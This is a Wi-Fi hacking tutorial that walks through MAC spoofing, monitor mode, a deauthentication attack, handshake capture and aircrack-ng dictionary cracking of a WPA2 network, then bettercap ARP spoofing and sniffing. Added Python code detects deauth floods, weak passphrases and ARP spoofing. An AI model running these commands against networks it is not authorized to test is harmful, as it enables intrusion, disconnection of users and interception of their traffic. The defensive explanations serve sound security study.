Wi-Fi is used everywhere: at home, in cafes and in public places. That makes every one of those places a potential target for hackers. In this article I will walk through the process hackers use to crack Wi-Fi passwords on Linux, so that you understand how it works.
Necessary tools to hack Wifi password
- Debian-based Linux operating system.
- A laptop and a USB Wi-Fi adapter that supports “Monitor Mode”. You can buy such a Wi-Fi USB adapter.
- The aircrack-ng tool, installed with the command “apt install aircrack-ng”.
- A tool to change the MAC address. You can download the available tools here or read the tutorial on how to change the MAC address using Python here.
Change MAC address
Each network interface has a fixed physical address assigned by the manufacturer. This address is called the MAC (Media Access Control) address. Other devices on the local network use the MAC address to identify the interface when delivering frames to it. It is better to change the MAC address before a Wi-Fi attack. We can change it using macchanger.
First we need the name of the wireless interface:
$ ip addr show
Then we bring the interface down, change the MAC address and bring it back up:
$ ip link set wlp7s9 down
$ macchanger -m DD:DD:DD:DD:DD:DD wlp7s9
$ ip link set wlp7s9 up
Sniff wifi packets
In normal operation the card is in “Managed Mode”, in which it only passes us the packets addressed to us. As a programmer we want to capture all Wi-Fi packets in the air, and “Managed Mode” cannot do that. To capture them, we have to switch the card to “Monitor Mode”. We can see the current mode with the command:
$ iwconfig
lo        no wireless extensions.
wlp7s9    IEEE 802.11  ESSID:off/any
          Mode:Managed  Access Point: Not-Associated   Tx-Power=16 dBm
You can see we are in “Managed” mode. So let’s change it to “Monitor” mode:
$ airmon-ng start wlp7s9
Run the iwconfig command again, it will show “Mode: Monitor” and the current interface is “wlp7s9mon”.
Airodump-ng is part of the Aircrack-ng suite. It is a packet sniffer that captures raw 802.11 frames one by one, and it lets us list and filter the Wi-Fi networks in range.
Now we will capture the packets. First, we need to know which APs (Access Points) are around us:
$ airodump-ng wlp7s9mon
BSSID              PWR  Beacons  #Data, #/s  CH  MB   ENC   CIPHER  AUTH  ESSID
BB:12:FF:38:BB:88  -46  6        0      0    5   260  WPA2  CCMP    PSK   Hacked
Then we capture only the traffic of the target AP on its channel and write it to a file:
$ airodump-ng --bssid BB:12:FF:38:BB:88 --channel 5 --write Hacked.cap wlp7s9mon
The problem is that we have to wait until a new client accesses the AP. We don’t know when someone will connect. To make the job easier, we can de-authenticate every client/user. This attack will disconnect everyone from the wifi they are on.
$ aireplay-ng --deauth 100 -a BB:12:FF:38:BB:88 -c DD:DD:DD:DD:DD:DD wlp7s9mon
This command will disconnect the person from wifi access for a while and the person will reconnect soon.
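The de-authentication attack above works because in WPA2 without 802.11w (Protected Management Frames) a deauth frame is neither encrypted nor authenticated, so the AP’s address can be forged. Enabling 802.11w on the AP and clients is the fix; until then, a burst of deauth frames is what a wireless IDS looks for. The following detector is an added example written for this article, not part of the original page or of the Aircrack-ng suite. It parses the fixed 802.11 header of raw frames (the frames, the client MAC DE:AD:BE:EF:00:01, the timestamps and the reason code 7 are all constructed; the BSSID BB:12:FF:38:BB:88 is the one shown in the airodump-ng output above) and alerts on any transmitter that sends 10 or more deauth/disassoc frames within one second, thresholds that are my own choice.

```python
from collections import defaultdict, deque

# 802.11 management subtypes (frame-control byte 0, upper nibble).
BEACON = 0x8
DISASSOC = 0xA
DEAUTH = 0xC

BROADCAST = "FF:FF:FF:FF:FF:FF"
AP_BSSID = "BB:12:FF:38:BB:88"          # BSSID from the airodump-ng output above
CLIENT = "DE:AD:BE:EF:00:01"            # constructed client address


def mac_bytes(mac):
    return bytes.fromhex(mac.replace(":", ""))


def build_mgmt_frame(subtype, dst, src, bssid, body=b""):
    """Build a raw 802.11 management frame: FC, duration, addr1-3, seq ctrl, body.
    Frame control byte 0 = subtype<<4 | type<<2 | version, type 0 = management."""
    fc = bytes([(subtype << 4) | (0 << 2) | 0, 0x00])
    return fc + b"\x00\x00" + mac_bytes(dst) + mac_bytes(src) + mac_bytes(bssid) + b"\x00\x00" + body


def parse_80211_header(frame):
    """Return (type, subtype, addr1, addr2, addr3) or None for a short frame.
    Assumes the radiotap header has already been stripped."""
    if len(frame) < 24:
        return None
    fc0 = frame[0]
    ftype, subtype = (fc0 >> 2) & 0x3, (fc0 >> 4) & 0xF

    def mac(off):
        return ":".join(f"{b:02X}" for b in frame[off:off + 6])

    return ftype, subtype, mac(4), mac(10), mac(16)


def is_deauth_like(frame):
    hdr = parse_80211_header(frame)
    return hdr is not None and hdr[0] == 0 and hdr[1] in (DEAUTH, DISASSOC)


def detect_deauth_flood(frames, window=1.0, threshold=10):
    """frames: iterable of (timestamp_seconds, raw_frame).
    Returns [(timestamp, transmitter_mac, count)], one alert per transmitter
    the first time it sends >= threshold deauth/disassoc frames within `window`."""
    recent = defaultdict(deque)   # transmitter -> timestamps in the window
    alerted, alerts = set(), []
    for ts, frame in frames:
        if not is_deauth_like(frame):
            continue
        tx = parse_80211_header(frame)[3]   # addr2 is the transmitter address
        q = recent[tx]
        q.append(ts)
        while q and ts - q[0] > window:
            q.popleft()
        if len(q) >= threshold and tx not in alerted:
            alerted.add(tx)
            alerts.append((ts, tx, len(q)))
    return alerts


def sample_capture():
    """Constructed capture: two beacons, a 30-frame broadcast deauth burst
    forged with the AP's address (reason code 7), then one legitimate deauth
    from a client that simply leaves the network."""
    frames = [(0.0, build_mgmt_frame(BEACON, BROADCAST, AP_BSSID, AP_BSSID)),
              (0.1, build_mgmt_frame(BEACON, BROADCAST, AP_BSSID, AP_BSSID))]
    for i in range(30):
        frames.append((round(0.5 + i * 0.01, 2),
                       build_mgmt_frame(DEAUTH, BROADCAST, AP_BSSID, AP_BSSID, b"\x07\x00")))
    frames.append((5.0, build_mgmt_frame(DEAUTH, AP_BSSID, CLIENT, AP_BSSID, b"\x03\x00")))
    return frames


if __name__ == "__main__":
    for ts, tx, n in detect_deauth_flood(sample_capture()):
        print(f"[{ts:.2f}s] deauth flood: {n} frames from {tx} within 1s")
```

A single deauth from a client is normal and does not trigger the alert; only the burst does. On a real capture the same logic runs over the frames airodump-ng writes, once the radiotap header has been removed.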
Using Dictionary Attack
Time to crack the password. We only need one file, “Hacked.cap-01”.
To crack a password, you need a password list file to perform a dictionary attack.
$ aircrack-ng Hacked.cap-01 -w Hack_Password.txt
Aircrack-ng 1.5.2
We just found the password. Now we should be able to connect to wifi.
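The dictionary attack only succeeds if the passphrase is in the wordlist, so the defender’s check is the mirror image: is my passphrase a valid WPA2 passphrase, and would a wordlist find it? The checker below is an added example for this article, not code from the page or from aircrack-ng. The wordlist in it is a small constructed stand-in for a file like Hack_Password.txt, and the 60-bit entropy floor is my own policy choice; the 8 to 63 printable-ASCII limit is the WPA2 passphrase rule from IEEE 802.11i.

```python
import math
import string

WPA2_MIN, WPA2_MAX = 8, 63           # passphrase length limits from IEEE 802.11i
MIN_BITS = 60                        # policy choice for this example, not a standard

# Constructed stand-in for a cracking wordlist such as Hack_Password.txt.
SAMPLE_WORDLIST = {"password", "12345678", "qwertyuiop", "letmein", "hackedwifi"}


def charset_size(pw):
    """Size of the smallest character class mix the passphrase draws from."""
    size = 0
    if any(c.islower() for c in pw):
        size += 26
    if any(c.isupper() for c in pw):
        size += 26
    if any(c.isdigit() for c in pw):
        size += 10
    if any(c == " " or c in string.punctuation for c in pw):
        size += 33                    # 32 punctuation characters plus space
    return size


def estimated_bits(pw):
    """Upper-bound entropy estimate: length * log2(charset). A real attacker
    does better than brute force, so treat this as optimistic."""
    return len(pw) * math.log2(charset_size(pw)) if pw else 0.0


def assess_passphrase(pw, wordlist=SAMPLE_WORDLIST, min_bits=MIN_BITS):
    """Return (ok, reasons). ok is True only when no reason was found."""
    reasons = []
    if not (WPA2_MIN <= len(pw) <= WPA2_MAX) or not all(32 <= ord(c) <= 126 for c in pw):
        reasons.append("not a valid WPA2 passphrase (8-63 printable ASCII characters)")
    norm = pw.lower()
    # Cracking rules commonly append digits, so strip them before the lookup.
    if norm in wordlist or norm.rstrip(string.digits) in wordlist:
        reasons.append("appears in the wordlist (with trailing digits removed)")
    bits = estimated_bits(pw)
    if bits < min_bits:
        reasons.append(f"estimated entropy {bits:.0f} bits is below {min_bits}")
    return (not reasons, reasons)


if __name__ == "__main__":
    for candidate in ("password1", "Hacked", "correct horse battery staple 7!"):
        ok, why = assess_passphrase(candidate)
        print(f"{candidate!r}: {'ok' if ok else 'weak: ' + '; '.join(why)}")
```

The wordlist lookup is the part that matters against aircrack-ng: a passphrase that is long but appears in a leaked-password list is cracked instantly, while one that is absent from every list forces the attacker back to PBKDF2 brute force.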
The wifi password was hacked, then what?
Once connected to the AP, we can find all the addresses associated with this network.
If we run the command “arp -a”, we can see all the associated MAC and IP addresses.
We can use bettercap to inspect the traffic.
$ ./bettercap
bettercap v2.26.1 (built for Linux amd64 with go1.11.6) [nhập ‘help’ để biết danh sách các lệnh]
192.168.8.0/24 > 192.168.8.4  » net.sniff on
192.168.8.0/24 > 192.168.8.4  » arp.spoof on
192.168.8.0/24 > 192.168.8.4  » [02:39:24] [net.sniff.dns] dns
After connecting to the access point we can perform more advanced attacks, such as a MITM (man-in-the-middle) attack.
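The “arp.spoof on” step above works by answering ARP for the gateway with the attacker’s own MAC, and the “arp -a” table on any client records exactly that change. The script below is an added example for this article, not code from the page or from bettercap: it parses two Linux-format “arp -a” snapshots and reports an IP whose MAC changed between them, and a MAC that answers for the gateway and another host at once. The snapshots, the gateway address 192.168.8.1 and the MACs are constructed; the 192.168.8.0/24 subnet and the host 192.168.8.4 are taken from the bettercap prompt above, and DD:DD:DD:DD:DD:DD is the address set with macchanger earlier on the page.

```python
import re
from collections import defaultdict

# Linux `arp -a` line: "host (ip) at mac [ether] on iface"; incomplete entries
# ("at <incomplete>") do not match and are skipped.
ARP_LINE = re.compile(r"\((?P<ip>[\d.]+)\) at (?P<mac>[0-9a-f:]{17})", re.I)

# Constructed snapshots of a client's ARP table before and after arp.spoof.
SNAPSHOT_BEFORE = """\
_gateway (192.168.8.1) at aa:bb:cc:00:00:01 [ether] on wlp7s9
? (192.168.8.4) at dd:dd:dd:dd:dd:dd [ether] on wlp7s9
? (192.168.8.9) at <incomplete> on wlp7s9
? (192.168.8.10) at 11:22:33:44:55:66 [ether] on wlp7s9
"""
SNAPSHOT_AFTER = """\
_gateway (192.168.8.1) at dd:dd:dd:dd:dd:dd [ether] on wlp7s9
? (192.168.8.4) at dd:dd:dd:dd:dd:dd [ether] on wlp7s9
? (192.168.8.10) at 11:22:33:44:55:66 [ether] on wlp7s9
"""


def parse_arp_table(text):
    """Parse `arp -a` output into {ip: mac} with MACs normalised to lowercase."""
    table = {}
    for line in text.splitlines():
        m = ARP_LINE.search(line)
        if m:
            table[m.group("ip")] = m.group("mac").lower()
    return table


def find_arp_anomalies(before, after, gateway_ip):
    """Compare two {ip: mac} snapshots. Returns a list of findings:
    ("mac_changed", ip, old_mac, new_mac) for any IP whose MAC moved, and
    ("gateway_mac_shared", gateway_ip, mac, [other_ips]) when the gateway's
    MAC is also claimed by other hosts, the signature of a gateway spoof."""
    findings = []
    for ip, mac in after.items():
        old = before.get(ip)
        if old is not None and old != mac:
            findings.append(("mac_changed", ip, old, mac))
    owners = defaultdict(set)
    for ip, mac in after.items():
        owners[mac].add(ip)
    gw_mac = after.get(gateway_ip)
    if gw_mac and len(owners[gw_mac]) > 1:
        others = sorted(owners[gw_mac] - {gateway_ip})
        findings.append(("gateway_mac_shared", gateway_ip, gw_mac, others))
    return findings


if __name__ == "__main__":
    before = parse_arp_table(SNAPSHOT_BEFORE)
    after = parse_arp_table(SNAPSHOT_AFTER)
    for finding in find_arp_anomalies(before, after, "192.168.8.1"):
        print(finding)
```

Polling “arp -a” like this is the cheapest host-side check; the network-side mitigations are static ARP entries for the gateway, dynamic ARP inspection on the switch, and client isolation on the AP so that stations cannot reach each other at layer 2 at all.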